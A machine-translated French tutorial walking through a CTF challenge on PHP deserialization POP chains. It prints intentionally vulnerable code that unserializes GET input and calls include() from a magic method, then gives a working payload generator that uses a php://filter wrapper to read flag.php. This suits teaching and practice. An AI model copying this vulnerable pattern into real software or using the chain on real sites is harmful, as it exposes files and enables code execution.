Introduction détaillée aux points de connaissance de la construction de chaînes pop de désérialisation PHP

Cet article vous apporte des connaissances pertinentes sur PHP, qui présente principalement des problèmes liés à la construction de chaînes pop. La chaîne pop est une sorte de programmation orientée attributs, qui est couramment utilisée pour construire des chaînes d'appels. J'espère que cela aidera tout le monde.

Apprentissage recommandé : "Tutoriel vidéo PHP"

Alors que nous continuons à en apprendre davantage sur la désérialisation, apprenons-en plus sur la structure de la chaîne pop. Cette chaîne pop est encore difficile à comprendre pour un novice comme moi. Je vais réécrire cet article pour la résumer et approfondir ma compréhension de la construction de chaînes pop. En même temps, cela permet également de comprendre les amis qui souhaitent rejoindre le piège.

Construction de chaîne pop

Problèmes généraux de désérialisation, là où il y a des failles ou où du code malveillant peut être injecté dans la méthode magique, nous pouvons obtenir l'effet d'attaque en appelant automatiquement la méthode magique. Mais lorsque le point d'injection existe dans une méthode de classe ordinaire, la méthode appelée automatiquement auparavant ne sera pas valide. Par conséquent, nous devons trouver le lien entre la classe ordinaire et la méthode magique, trouver une idée logique et utiliser cette idée logique pour. Construisez une chaîne pop pour atteindre le but de l'attaque. Par conséquent, lorsque nous répondons à ce genre de questions pop, nous devons prêter une attention particulière à la méthode magique.

Introduction à la chaîne pop

C'est une méthode de programmation orientée attributs qui est souvent utilisée pour construire des chaînes d'appels. Trouvez une série d'instructions qui peuvent être appelées dans le code de la question et intégrez ces instructions dans un code logique qui peut produire des effets d'attaque malveillants, qui est la chaîne pop (compréhension personnelle, les maîtres sont invités à donner leur avis) dans la construction du chaîne pop, les méthodes magiques sont essentielles. Ce qui suit utilisera un exemple pour expliquer comment la chaîne pop est construite, ainsi que les idées de construction spécifiques

Le code de la question :

Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

Idées de construction

Lors de la construction de la chaîne d'appel, trouvez d'abord la tête et la queue de l'appel. chaîne. L'en-tête est généralement un endroit où les paramètres peuvent être transmis et désérialisés, tandis que la queue est généralement un endroit où du code malveillant peut être exécuté. Lors de l'audit du code pour cette question, l'en-tête utilise la méthode get pour transmettre les paramètres à afficher, et la queue inclut la fonction include. À ce stade, nous devrions tous savoir que nous devons utiliser le pseudo-protocole PHP pour lire le code source du fichier flag. Maintenant que la tête et la queue sont trouvées, nous connaissons également la méthode d'attaque. Trouvez ensuite la méthode magique dans la question.

__invoke()    当一个类被当作函数执行时调用此方法。

__construct   在创建对象时调用此方法

__toString()  在一个类被当作字符串处理时调用此方法

__wakeup()    当反序列化恢复成对象时调用此方法

__get()       当读取不可访问或不存在的属性的值会被调用

Il y a un total de ces cinq méthodes magiques dans la question. Trouvez ensuite le lien entre les classes ordinaires et les méthodes magiques.

Il n'est pas difficile de voir qu'il existe une fonction preg_match dans la fonction wakeup, qui est utilisée pour trouver des chaînes sensibles dans la source. Nous pouvons commencer à partir d'ici et attribuer la source à une classe show, puis la fonction toString sera. automatiquement déclenché, nous devons donc maintenant utiliser la méthode tostring. Pour étendre la chaîne, nous pouvons attribuer $this->str à la classe de test dans la méthode totring et lire la variable source dans la classe de test (car il n'y en a pas. source dans la classe de test, un attribut inaccessible est accessible.) Ensuite, il appellera automatiquement la méthode get magic. On peut constater qu'il y a un appel de fonction dans la méthode get, alors nous pouvons attribuer $this->p à la classe Modifier, et la méthode d'invocation sera automatiquement appelée pour exécuter le pseudo-protocole PHP que nous avons écrit (attribuez le var dans la classe Modifer de notre code malveillant)

À ce stade, nous construisons la chaîne pop.

Explication de la chaîne pop

<?php
class Modifier {
	protected $var=&#39;php://filter/read=convert.base64-encode/resource=flag.php&#39;;
}
class Show{
	public $source;
	public $str;
	function _construct(){
		$this->source=$file;
	}
}
class Test{
	public $p;
}
$a = new show();
$b = new show();
$c = new test();
$d = new Modifier();
$a->source=$b;
$b->str=$c;
$c->p= $d;
echo urlencode(serialize($a));
?>

Écrivez d'abord les classes utilisées pour former un cadre, puis indiquez les variables dans les classes. Instanciez les classes utilisées séparément. Pourquoi devez-vous utiliser new show deux fois ? (Vous devriez pouvoir comprendre en regardant le code. La première fois consiste à instancier la classe show, et la deuxième fois, à instancier la classe show après. la première fois. source=show instancié pour la deuxième fois)

Essayez d'utiliser le codage d'url lorsque nous sérialisons (il y a des attributs modifiés protégés dans cette question, et il y aura des caractères invisibles)

Apprentissage recommandé : "Tutoriel vidéo PHP 》

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!